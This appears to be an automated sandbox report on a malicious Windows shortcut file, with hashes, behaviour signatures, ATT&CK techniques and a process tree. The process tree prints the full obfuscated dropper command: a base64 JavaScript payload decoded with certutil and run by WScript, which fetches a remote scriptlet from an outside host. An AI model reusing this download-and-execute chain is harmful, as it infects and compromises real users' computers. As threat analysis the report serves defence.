d9ca073cae31b8240d4c8295437147a2721158f25c3791c32bd78e58eabe9889

Analysis

max time kernel
221s
max time network
270s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
09/02/2023, 14:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

20da683eb5903624a7c6b1824ba09a99.lnk
Size

485B
MD5

20da683eb5903624a7c6b1824ba09a99
SHA1

45d5e2b2529d35d55eda037e7752b8c3a6119e87
SHA256

d9ca073cae31b8240d4c8295437147a2721158f25c3791c32bd78e58eabe9889
SHA512

3317d0f72d0953399ffad7c6fb53126cf738bae2f7fdf128579e68fb10564608436010b5e3c46a6edd851f47dc240332cd8fcc3937b0c2c80702e3463dfe359a

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	4188	WScript.exe
18	4188	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4092	conhost.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3516 wrote to memory of 4092	3516	cmd.exe	79
PID 3516 wrote to memory of 4092	3516	cmd.exe	79
PID 4092 wrote to memory of 3312	4092	conhost.exe	80
PID 4092 wrote to memory of 3312	4092	conhost.exe	80
PID 3312 wrote to memory of 3812	3312	cmd.exe	83
PID 3312 wrote to memory of 3812	3312	cmd.exe	83
PID 3312 wrote to memory of 4188	3312	cmd.exe	84
PID 3312 wrote to memory of 4188	3312	cmd.exe	84

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\20da683eb5903624a7c6b1824ba09a99.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3516
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\KZUXT80\>nul 2>&1 &&s^eT SHGP=C:\KZUXT80\^KZUXT80.^jS&&echo dmFyIEN5bkQ9InNjIisiciI7RHluRD0iaXAiKyJ0OmgiO0V5bkQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDeW5EK0R5bkQrRXluRCsiLy82cnVhaGkud2ViY29uZWN0YS5waWNzLz8xLyIpOw==>!SHGP!&&cErtUtil -f -dEco^de !SHGP! !SHGP!&&ca^ll !SHGP!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\KZUXT80\>nul 2>&1 &&s^eT SHGP=C:\KZUXT80\^KZUXT80.^jS&&echo dmFyIEN5bkQ9InNjIisiciI7RHluRD0iaXAiKyJ0OmgiO0V5bkQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDeW5EK0R5bkQrRXluRCsiLy82cnVhaGkud2ViY29uZWN0YS5waWNzLz8xLyIpOw==>!SHGP!&&cErtUtil -f -dEco^de !SHGP! !SHGP!&&ca^ll !SHGP!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3312
  - - C:\wINdOws\sYSteM32\certutil.exe
      cErtUtil -f -dEcode C:\KZUXT80\KZUXT80.jS C:\KZUXT80\KZUXT80.jS
      4⤵
      PID:3812
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\KZUXT80\KZUXT80.jS"
      4⤵
      Blocklisted process makes network request
      PID:4188

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\KZUXT80\KZUXT80.jS

Filesize
150B

MD5
36743e631851b686dcae376535eb4015

SHA1
d16767197cdca5cef5aaecc30f59d198efa81da6

SHA256
130b3c5f52c7be91753a282cc9e12aaac1178b8d32d4834ade5033115bbee97a

SHA512
91a556b374bb7f30be99959d4ee993331a41341b35f90ef75e8ab5cff57ef2724ea86359c3dc42eb6ecc85fe3256bd4c562c87f3b3b4b26b7b1f68aa145dcbf7

Download Submit
C:\KZUXT80\KZUXT80.jS

Filesize
109B

MD5
1900502e97142d6927f572c375902e83

SHA1
8c068db33c5f7be55efe9d76df0132b2fc7a240b

SHA256
6b6d71b66be9bb35ff98dc75e97165e7b1558f68ad8b5a1ba5375bfd5e765700

SHA512
dbad5671c310181539986336c8ff1891d972b33e73a6b09f1ffc58a368569c645bee3e4f0c04ad96e63cab90d7b87d6bad345939715a97b4f5d0cc75e474eb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\20da683eb5903624a7c6b1824ba09a99.lnk

Filesize
1KB

MD5
f6fe3996ef8ed30376d614e1afe1c132

SHA1
f234275f32c9c745e13d29102da58b76b9a627c5

SHA256
560a2a02994bd99e9ab72927babd5abcc548bb6b38a6d8545517504949fd7271

SHA512
96b3c4fc306e97ac22dcf1cce5793bd14a26f9f16a9949423fa42c2d543aa8247d48c51a35b6916d2fd0e726374790b0630f8c0e2afca9bc0bd274e7d08c996f

Download Submit